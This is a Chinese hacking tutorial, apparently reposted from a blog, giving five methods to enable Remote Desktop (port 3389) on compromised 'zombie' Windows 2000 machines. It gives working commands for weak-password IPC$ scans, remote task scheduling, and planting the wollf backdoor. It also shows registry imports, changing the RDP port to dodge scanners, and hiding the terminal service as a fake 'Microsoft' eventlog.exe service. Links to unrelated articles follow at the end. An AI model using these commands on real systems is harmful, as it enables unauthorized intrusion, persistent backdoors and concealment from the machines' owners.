五种办法开启3389终端!!(推荐)

简介:
第一种方法: 

使用的工具: 
1:ipcscan扫描器 
2:终端服务连接工具xpts.exe(WIN 2000/XP 终端连接程序. 内附有COPY 文件的补丁. 格式 IPort ) 
3:开终端的脚本rots.vbs(灰色轨迹zzzevazzz的作品) 
4:cscript (在system32文件夹下;98操作系统可能没有 
二:步骤: 
1:用ipcscan扫描弱口令(你们可以自己扫,我也扫到一些弱口令主机.演实时间我在论坛上再发) 

2:用rots.vbs开启终端服务 

说明 cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项] 

格式 cscript.exe rots.vbs ip user userpass port /r 
或者 cscript.exe rots.vbs ip user userpass port /fr 


三:常见问题: 

1:脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。因为pro版不能安装终端服务.如果你确信脚本判断错误,就继续安装好了. 

2:可能会出现:Conneting 202.202.202.202 ....Error0x80070776 .Error description: 没有发现指定的此对象导出者,这个还是放弃吧. 

3:可能会连接不上,请用这个格式127.0.0.1:1818 1818是刚才开的端口. 
==============================================================================
第二种方法: 

进入后:TELNET上去! 

c:\>echo [Components] > c:\rock 
c:\>echo TSEnable = on >> c:\rock 
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q 
或者! 
c:\>echo [Components] > d:\wawa 
c:\>echo TSEnable = on >> d:\wawa 
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:d:\wawa /q 
等会自动启后就OK 


或者: 
在本地利用DOS命令edit建立.bat后缀批处理文件(文件名随意) echo [Components] > c:\sql 

echo TSEnable = on >> 

c:\sqlsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q 

net use \\ip地址\ipc$ 密码 /user:用户名(一般默认:administrator) 

利用at time 获取对方服务器时间。 

copy 路径:\xxx.bat \\ip地址\$c:\winnt 

at time 00:00:00 xxx.bat 

服务器执行命令后,服务器将重新启动,利用3389登陆就OK了! 
==============================================================================第三种方法: 

进入后,再次检查终端组件是否安装: 
c:\>query user 
这个工具需要安装终端服务. 

这样就进一步确定了组件没有被安装.如果返回: 
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME 
>w1 console 0 运行中 . 2002-1-12 22:5 
\\类似这样的信息,可能组件就已安装. 

好!都清楚了,可以开始安装了. 
--------------------------------------------------- 
C:\>dir c:\sysoc.inf /s //检查INF文件的位置 
c:\WINNT\inf 的目录 

2000-01-10 20:00 3,770 sysoc.inf 
1 个文件 3,770 字节 
----------------------------------------------------- 
C:\> dir c:\sysocmgr.* /s //检查组件安装程序 
c:\WINNT\system32 的目录 

2000-01-10 20:00 42,768 sysocmgr.exe 
1 个文件 42,768 字节 
----------------------------------------------------- 
c:\>echo [Components] > c:\rock 
c:\>echo TSEnable = on >> c:\rock 
//这是建立无人参与的安装参数 
c:\>type c:\rock 
[Components] 
TSEnable = on 
//检查参数文件 
------------------------------------------------------ 
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q 
----------------------------------------------------- 

这一条就是真正安装组件的命令. 
以上这条命令没有加/R参数,主机在安装完后自动重起. 
如若加了/R参数主机就不会重起. 

如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时, 
3389终端服务就已经开启.你就可以连上去了. 

问题和建议: 

A 在安装过程中,不使用/R,有时主机也不会重起,你就要手动重起他,但在使用诸如:iisreset /reboot命令时,对方 
的屏幕会出现个对话框,写着谁引起的这次启动,离重起还有多少秒. 

B 一次不行可以再试一次,在实际中很有作用. 

C 在输入sysocmgr命令开始安装时,一定不要把命令参数输错,那会在对方出现一个大的对话框,是sysocmgr的帮助,很是显眼, 
而且要求确定.在你的屏幕上是不会有任何反应的,你不会知道出错,所以会有B的建议. 

==============================================================================
第四种方法: 
========================================================================================== 

C:\document. and Settings\shanlu.XZGJDOMAIN>net use \\218.22.155.*\ipc$ "" /us 
er:administrator----------------连接成功! 
命令成功完成。 

C:\document. and Settings\shanlu.XZGJDOMAIN>copy wollf.exe \\218.22.155.*\admi 
n$------------------------------拷贝wollf.exe到目标计算机的admin$目录 
已复制 1 个文件。 

C:\document. and Settings\shanlu.XZGJDOMAIN>copy hbulot.exe \\218.22.155.*\adm 
in$-----------------------------拷贝hbulot.exe到目标计算机的admin$目录 
已复制 1 个文件。 

C:\document. and Settings\shanlu.XZGJDOMAIN>net time \\218.22.155.* 
\\218.22.155.* 的当前时间是 2002/12/1 上午 06:37 
命令成功完成。 

C:\document. and Settings\shanlu.XZGJDOMAIN>at \\218.22.155.* 06:39 wollf.exe 
新加了一项作业,其作业 ID = 1--指定wollf.exe在06:39运行 
------------------------------------------------------------------------------
说明: 
wollf.exe是一个后门程序,很多高手都喜欢nc或者winshell,不过我对他情有独钟!在这里我只介绍与本文内 

容有关的命令参数,它的高级用法不做补充。 
hbulot.exe是用于开启3389服务,如果不是server及以上版本,就不要运行了。因为pro版不能安装终端服务。 
2分钟后...... 


------------------------------------------------------------------------------
C:\document. and Settings\shanlu.XZGJDOMAIN>wollf -connect 218.22.155.* 7614 
"Wollf Remote Manager" v1.6 
Code by wollf, [url]http://www.xfocus.org[/url] 
------------------------------------------------------------------------------说明: 
使用wollf连接时要注意wollf.exe要在当前目录,它的连接命令格式:wollf -connect IP 7614 
7614是wollf开放的端口。如果显示如上,说明你已经连接成功,并具有管理员administrator权限。 

------------------------------------------------------------------------------------------ 
[server@D:\WINNT\system32]#dos 

Microsoft Windows 2000 [Version 5.00.2195] 
(C) 版权所有 1985-2000 Microsoft Corp. 
------------------------------------------------------------------------------
说明: 
输入dos,你就会进入目标机的cmd下,这时同样具有administrator权限。 


------------------------------------------------------------------------------
D:\WINNT\system32>cd.. 
cd.. 

D:\WINNT>dir h*.* 
dir h*.* 
驱动器 D 中的卷没有标签。 
卷的序列号是 1CE5-2615 

D:\WINNT 的目录 

2002-11-27 03:07 <DIR> Help 
2002-09-10 12:16 10,752 hh.exe 
2002-10-01 08:29 24,576 HBULOT.exe 
2 个文件 35,328 字节 
1 个目录 9,049,604,096 可用字节 

D:\WINNT>hbulot 
hbulot 
------------------------------------------------------------------------------ 
说明: 
因为我们把HBULOT.exe放到目标机的admin$下的,所以先找到它,以上是文件的存放位置。 


==============================================================================
D:\WINNT>exit 
exit 

Command "DOS" succeed. 

[server@D:\WINNT\system32]#reboot 


Command "REBOOT" succeed. 

[server@D:\WINNT\system32]# 
Connection closed. 
------------------------------------------------------------------------------ 
说明: 
由dos退到wollf的连接模式下用exit命令,HBULOT.exe运行后需重新启动方可生效,这里wollf自带的REBOOT 
命令,执行过在5秒后你就会失去连接。启动完毕后检查一下3389端口是否开放,方法很多,superscan3扫一下 

。这时候你就可以登陆了。如果没有开放3389那就不是server及以上版本,就不要运行了。因为pro版不能安装 

终端服务。 

到这里,你已经拥有3389肉鸡了!但是会不会被别的入侵者发现呢?下面所教的就是怎么让3389只为你服务! 

我们现在使用的3389登陆器有两种版本,一种是2000/98,一种是XP。二者区别呢?前者使用的默认端口3389对 

目标,后者默认的也是3389端口,但是它还支持别的端口进行连接!所以呢......我们来修改3389的连接端口 

来躲过普通扫描器的扫描!修改方法如下: 
修改服务器端的端口设置 ,注册表有2个地方需要修改。 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] 
PortNumber值,默认是3389,修改成所希望的端口,比如1314 
第二个地方: 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]  
PortNumber值,默认是3389,修改成所希望的端口,比如1314 
现在这样就可以了。重启系统吧。 
注意:事实上,只修改第二处也是可以的。另外,第二处的标准联结应该是 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\<connection> 
<connection>表示具体的某个RDP-TCP连结。 
重启过后,看看端口有没有改。 
小技巧:修改注册表键值时,先选择10进制,输入你希望的端口数值,再选择16进制,系统会自动转换。 

==============================================================================第五种方法: 



一.原理性基本安装 
1.将如下注册表键值导入 "肉机" 的注册表中: 

------------- 

Windows Registry Editor Version 5.00 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] 
"Enabled"="0" 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 
"ShutdownWithoutLogon"="0" 

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] 
"EnableAdminTSRemote"=dword:00000001 

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] 
"TSEnabled"=dword:00000001 

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] 
"Start"=dword:00000002 

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] 
"Start"=dword:00000002 

[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] 
"Hotkey"="1" 

----------- 
2.重新起动"肉机"。 

3.使用本地的3398客户端,连接 "肉机" . 

4.优(缺)点: 

A."肉机"中 "控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务" 仍然处于未安装状态. 
B."肉机"中 "开始-->程序-->管理工具" 没有任何变动. 
C."肉机"中 "开始-->程序-->管理工具-->服务-->Terminal Services" 变为 "已起动" 和"自动". 
D."肉机"中 "Windows 任务管理器-->进程" 内,增加 "Termsrv.exe". 

5.与"sysocmgr /iysoc.inf /u:u.txt /q" 的比较: 

A."肉机"中 "控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务" 处于已安装状态. 
B."肉机"中 "开始-->程序-->管理工具" 增加 "终端服务管理器","终端服务配置" 和 "终端服务客户端生成器". 
C."肉机"中 "开始-->程序-->管理工具-->服务-->Terminal Services" 变为 "已起动" 和"自动". 
D."肉机"中 "Windows 任务管理器-->进程" 内,增加 "Termsrv.exe". 
E.需要拷贝几兆的文件到"肉机"中. 

二.抛砖引玉性"隐蔽"安装: 

1.将"肉机"中 "c:\winnt\system32\termsrv.exe" 文件作一备份,命名为"eventlog.exe",仍将其放入目录 "c:\winnt\system32\" 

2.将如下注册表键值导入 "肉机" 的注册表中: 

------------ 
Windows Registry Editor Version 5.00 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] 
"Enabled"="0" 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 
"ShutdownWithoutLogon"="0" 

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] 
"EnableAdminTSRemote"=dword:00000001 

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] 
"TSEnabled"=dword:00000001 

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] 
"Start"=dword:00000002 

[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] 
"Hotkey"="1" 

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] 
"Start"=dword:00000002 
"ErrorControl"=dword:00000001 
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ 
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\ 
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 
"ObjectName"="LocalSystem" 
"Type"=dword:00000010 
"Description"="Microsoft" 
"DisplayName"="Microsoft" 

--------------- 

3.重新起动"肉机"。 

4.使用本地的3398客户端,连接“肉机”。 

5.优(缺)点: 

A."肉机"中 "控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务" 仍然处于未安装状态. 
B."肉机"中 "开始-->程序-->管理工具" 没有任何变动. 
C."肉机"中 "开始-->程序-->管理工具-->服务-->Terminal Services" 没有变化,保持原始状态. 
D."肉机"中 "开始-->程序-->管理工具-->服务" 增加 "Microsoft" 
E."肉机"中 "Windows 任务管理器-->进程" 内,增加 "eventlog.exe". 

三.理论简介 

如此简单? 只修改注册表? 不需要拷贝W2k源文件? 

让我们从一条命令行语句说起,这条语句是: "sysocmgr /iysoc.inf /u:u.txt /q" . 其中 u.txt 如下: 
------------- 
[Components] 
TsEnable = on 
------------- 

首先认识 "sysoc.inf"."sysoc.inf" 是安装信息文件,位于 "c:\winnt\inf". 打开它,在 "[Components]" 节,找到与 "终端服务" 有关的条目: 

"TerminalServices=TsOc.dll, HydraOc, TsOc.inf,,2" 

这里引出另外一个安装信息文件: "TsOc.inf". 这个文件同样位于 "c:\winnt\inf". 

打开这个文件,你会发现,如同 windows 环境下的软件安装, "终端服务" 的安装, 也主要由三个部分: 拷贝源文件,注册 DLL 以及修改注册表. 

在 [TerminalServices.FreshInstall] 节 和 "File Sections" 部分,你会发现 "终端服务" 所需的系统文件,DLL 和驱动, 随同 W2k 的初始安装,都已安然就位. 

为什么 "终端服务" 的常规安装和命令行安装都需要拷贝W2k源文件? 事实上,所拷贝的是"终端服务"客户端软件,既 "开始-->程序-->管理工具-->终端服务客户端生成器" 生成客户软盘需要的文件. 

各位 "黑友" 提供的包或工具,里面包括的W2k源文件,都是 "tsc32" 打头的. 关连 "TsOc.inf" 的 "File Sections" 部分和另外一个文件 "c:\winnt\inf\layout.inf",你将会得到证实. 

"终端服务"的安装,需要注册俩个 "DLL". 这俩个 "DLL" 同样早早就住在系统里,想必它们一定也有了身份证. 

"TsOc.inf" 文件一半的内容是关于修改注册表. 但"终端服务" 需要的"Reg.AddToFreshInstall, Reg.AddTo50, Reg.AddTo40" 都是在系统安装时注册过的. 

我们回头看一下那个命令行语句, "/u:" 参数后面的无人职守安装信息文件 "u.txt". "TsEnable = on" ? 

"TsOc.inf" 文件 [Optional Components] 节中有三个选项, "TerminalServices", "TSEnable" ,"TSClients". 

"TerminalServices" 如上所述,在系统初始安装时,已经就序. "TSClients" 与 "终端服务" 没有直接的关系. 

我们在 "TsOc.inf" 找到 "[TsEnable]" 节. 此节中有用的信息只有一条 "ToggleOnSection = TerminalServices.ToggleOn". 再转到 [TerminalServices.ToggleOn] 节. 

[TerminalServices.ToggleOn] 节告诉我们,下一站是 "Reg.ToggleOn", 沿着这个线索,我们来到 [Reg.ToggleOn], 你看到















本文转自loveme2351CTO博客,原文链接:http://blog.51cto.com/loveme23/8573 ,如需转载请自行联系原作者









相关文章
|
6月前
|
Shell 测试技术
Airtest如何自动连接重启后的设备并继续执行自动化脚本呢?
Airtest如何自动连接重启后的设备并继续执行自动化脚本呢?
181 0
|
网络协议 网络安全
openWRT软路由AdGuardHome 未运行 未重定向无法更新核心解决办法
openWRT软路由AdGuardHome 未运行 未重定向无法更新核心解决办法
8016 0
|
4月前
|
安全 数据安全/隐私保护 网络虚拟化
win10 无需下载软件,不用向日葵、不用todesck也能快速远程!而且密码会自动定时更新!25
【7月更文挑战第25天】在Windows 10中,快速助手是内置的远程协助工具,用于无第三方软件情况下的远程支持。用户需通过搜索打开应用,提供帮助者先登录微软账号获取安全代码,然后被帮助者输入该代码以建立连接。连接有10分钟有效期,需在时间内输入。连接建立后,提供帮助者需请求控制权,经被帮助者同意后才能操作对方电脑。整个过程增强了安全性,但流程与向日葵、Todesk等第三方工具不同。
82 7
|
应用服务中间件
【端口号清除工具】port is already in use解决利器,从此告别每次输入命令杀端口
【端口号清除工具】port is already in use解决利器,从此告别每次输入命令杀端口
156 0
|
前端开发 Linux 网络安全
前端可以掌握的linux命令: 三种远程方式和三种关机重启的方式
前言: 平常自己喜欢折腾,所以自己买了云服务器,有时候会捯饬一下,所以避免不了要跟linux系统打交道,那么第一步便是如何远程,如何开机如何重启的问题
563 0
|
网络安全
树莓派连接电脑,显示拒绝连接解决方案
树莓派连接电脑,显示拒绝连接解决方案
882 0
|
Linux Windows
远程批量管理主机的关机和重启实现工具 - WGCLOUD
WGCLOUD有个功能模块叫做下发指令,可以将关机或重启的指令下发给多个主机执行,使用起来非常简单
远程批量管理主机的关机和重启实现工具 - WGCLOUD
实现远程批量管理主机的关机和重启 - WGCLOUD
WGCLOUD有个功能模块叫做下发指令,可以将关机或重启的指令下发给多个主机执行,使用起来非常简单
实现远程批量管理主机的关机和重启 - WGCLOUD
|
开发者
pbootcms启用独立手机版
pbootcms启用独立手机版
869 0
pbootcms启用独立手机版
|
弹性计算 运维 Ubuntu
效率神器!云助手----发送远程命令:通过发送远程命令窗口,无需登录到实例内部,即可直接执行命令。
发送远程命令可以帮助您在实例内部快速执行命令,即无需远程连接登录实例,即可完成查看硬盘空间、安装软件、启动停止服务等操作。该功能通过 云助手 的命令执行功能实现,如果您的实例还没有安装或激活云助手客户端,请先 安装或者激活 。
12617 0
效率神器!云助手----发送远程命令:通过发送远程命令窗口,无需登录到实例内部,即可直接执行命令。